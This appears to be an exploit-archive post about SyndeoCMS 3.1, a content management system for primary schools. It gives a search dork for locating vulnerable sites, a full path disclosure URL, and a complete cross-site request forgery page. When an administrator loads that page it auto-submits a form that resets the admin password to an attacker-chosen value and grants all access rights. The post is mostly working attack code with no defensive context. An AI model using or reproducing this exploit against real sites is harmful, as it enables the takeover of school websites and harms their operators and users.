SyndeoCMS <= 3.1 FPD & CSRF change Admin password

Download | Vote Up (0) | Vote Down (0)

# Version 3.1
# Dork intext:"Site created with SyndeoCMS"

Introduction
------------

SyndeoCMS is a Primary School oriented CMS.

Full Path Disclosure
--------------------

http://[site]/starnet/version.php

CSRF exploit (change admin password)
------------------------------------ 

 1
 2<body onload='document.forms[0].submit()'>
 3<form method='post' action='http://[site]/starnet/index.php?option=configuration&suboption=users&modoption=save_user&user_id=5'>
 4        <input type='hidden' name='fullname' value='admin'>
 5        <input type='hidden' name='username' value='admin'>
 6        <input type='hidden' name='password' value='hackyard'>
 7        <input type='hidden' name='email' value='dmin@adm.fr'>
 8        <input type='hidden' name='editor' value='2'>
 9        <input type='hidden' name='sections' value=''>
10        <input type='hidden' name='access_1' value='1'>
11        <input type='hidden' name='access_2' value='1'>
12        <input type='hidden' name='access_13' value='1'>
13        <input type='hidden' name='access_3' value='1'>
14        <input type='hidden' name='access_4' value='1'>
15        <input type='hidden' name='access_5' value='1'>
16        <input type='hidden' name='access_6' value='1'>
17        <input type='hidden' name='access_7' value='1'>
18        <input type='hidden' name='access_8' value='1'>
19        <input type='hidden' name='access_9' value='1'>
20        <input type='hidden' name='access_16' value='1'>
21        <input type='hidden' name='access_10' value='1'>
22        <input type='hidden' name='access_11' value='1'>
23        <input type='hidden' name='access_12' value='1'>
24        <input type='hidden' name='access_14' value='1'>
25        <input type='hidden' name='access_15' value='1'>
26        <input type='hidden' name='m_access[14]' value='1'>
27        <input type='hidden' name='m_access[8]' value='1'>
28        <input type='hidden' name='m_access[6]' value='1'>
29        <input type='hidden' name='m_access[10]' value='1'>
30        <input type='hidden' name='m_access[0]' value='1'>
31        <input type='hidden' name='m_access[15]' value='1'>
32        <input type='hidden' name='m_access[1]' value='1'>
33        <input type='hidden' name='m_access[11]' value='1'>
34        <input type='hidden' name='m_access[12]' value='1'>
35        <input type='hidden' name='m_access[9]' value='1'>
36        <input type='hidden' name='m_access[13]' value='1'>
37        <input type='hidden' name='m_access[16]' value='1'>
38        <input type='hidden' name='m_access[7]' value='1'>
39        <input type='hidden' name='m_access[19]' value='1'>
40        <input type='hidden' name='m_access[2]' value='1'>
41        <input type='hidden' name='m_access[17]' value='1'>
42        <input type='hidden' name='m_access[18]' value='1'>
43        <input type='hidden' name='m_access[3]' value='1'>
44        <input type='hidden' name='m_access[4]' value='1'>
45        <input type='hidden' name='m_access[5]' value='1'>
46
47</form>
48</body>

Groucho

Be the first to give feedback !
Please login to comment !